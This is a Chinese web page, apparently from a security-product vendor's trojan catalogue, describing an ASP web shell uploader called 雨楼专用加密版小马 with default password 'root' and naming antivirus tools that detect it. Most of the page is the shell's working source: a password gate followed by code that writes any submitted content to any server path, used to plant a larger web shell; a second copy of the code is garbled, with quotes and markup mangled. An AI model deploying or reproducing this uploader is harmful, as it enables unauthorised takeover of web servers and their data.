雨楼专用加密版小马

2011-12-12 17:10:02 来源:本站原创,请勿转载 浏览:284
雨楼专用加密版小马

木马名称:雨楼专用加密版小马
木马格式:asp
默认密码:root
木马作用:是一匹小马,通过它上传大马。本身无害,但通过它可以上传具备强大破坏力的网页木马!

运行界面如下:

总结:asp网页木马: 雨楼专用加密版小马,是一匹小马,通过它上传大马。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 雨楼专用加密版小马  这个asp网页木马。

雨楼专用加密版小马部分代码:
<%
'┌───────────────┐
'│By:雨楼     │    QQ:8028934 │
'└───────────────┘
dim Userpwd,URL,Info,ServerIP,EvilST
Userpwd  = "root"   '
URL      = Request.ServerVariables("URL")
Info     = Request.ServerVariables("Appl_Physical_Path")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
EvilST = "<hr><font color=#00ff00  style='font-size: 12px'>雨楼专用加密版小马</font>"
If Request("pwd")=Userpwd or Request("pwd")=Request.ServerVariables("URL") then Session("mgler")=Userpwd
If Session("mgler")<>Userpwd Then
  If Request.Form("pwd")<>"" Then
    If Request.Form("pwd")=Userpwd Then
      Session("mgler")=Userpwd
      Response.Redirect URL
    Else
 Response.Write"<br><br><div align=center style='font-size: 12px'><font color=red>对不起,密码验证失败"
 Response.Write"密码验证失败<br><br><a href='"&URL&"'>返回上一级目录</a></div>"
    End If
  Else
    RW="<title>" & ServerIP & " - </title><center>"
    RW=RW & "<div style='width:500px;border:1px solid #222;padding:18px;margin:80px;'>"
    RW=RW & "<a href='http://www.baidu.com' ><span style='text-decoration: none'>【雨楼专用小马】</a><hr>"
    RW=RW & "<form action='" & URL & "' method='post'>"
    RW=RW & "加密:</font><input name='pwd' type='password' size='22' style='font-size: 12px;border:1px solid #000'> <input style='font-size: 12px;border:1px solid #000' type='submit' value='密码验证'>"
    RW=RW & "" & EvilST & "</center>"
    Response.Write RW
    RW=""
  End If
  Response.End
End If
%>
<%="<center><div style='width:500px;border:1px solid #222;padding:12px;margin:80px;'>"%>
<%="<hr></center>"%>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="<font size='2' color='red'>恭喜!已成功上传文件到:  "%>
<%= path%>
<%="</font>"%>
<%else%>
<%="<font size='2' color='red'>上传失败</font>"%>
<%end if%>
<%
'┌───────────────┐
'│By:雨楼 │ QQ:8028934 │
'└───────────────┘
dim Userpwd,URL,Info,ServerIP,EvilST
Userpwd = 'root' '
URL = Request.ServerVariables('URL')
Info = Request.ServerVariables('Appl_Physical_Path')
ServerIP = Request.ServerVariables('LOCAL_ADDR')
EvilST = '
雨楼专用加密版小马'
If Request('pwd')=Userpwd or Request('pwd')=Request.ServerVariables('URL') then Session('mgler')=Userpwd
If Session('mgler')<>Userpwd Then
If Request.Form('pwd')<>'' Then
If Request.Form('pwd')=Userpwd Then
Session('mgler')=Userpwd
Response.Redirect URL
Else
Response.Write'

对不起,密码验证失败'
Response.Write'密码验证失败

返回上一级目录
'
End If
Else
RW='' & ServerIP & ' -
'
RW=RW & '
'
RW=RW & '【雨楼专用小马】
'
RW=RW & '
'
RW=RW & '加密:
'
RW=RW & '' & EvilST & '
'
Response.Write RW
RW=''
End If
Response.End
End If
%>

(0)
(0)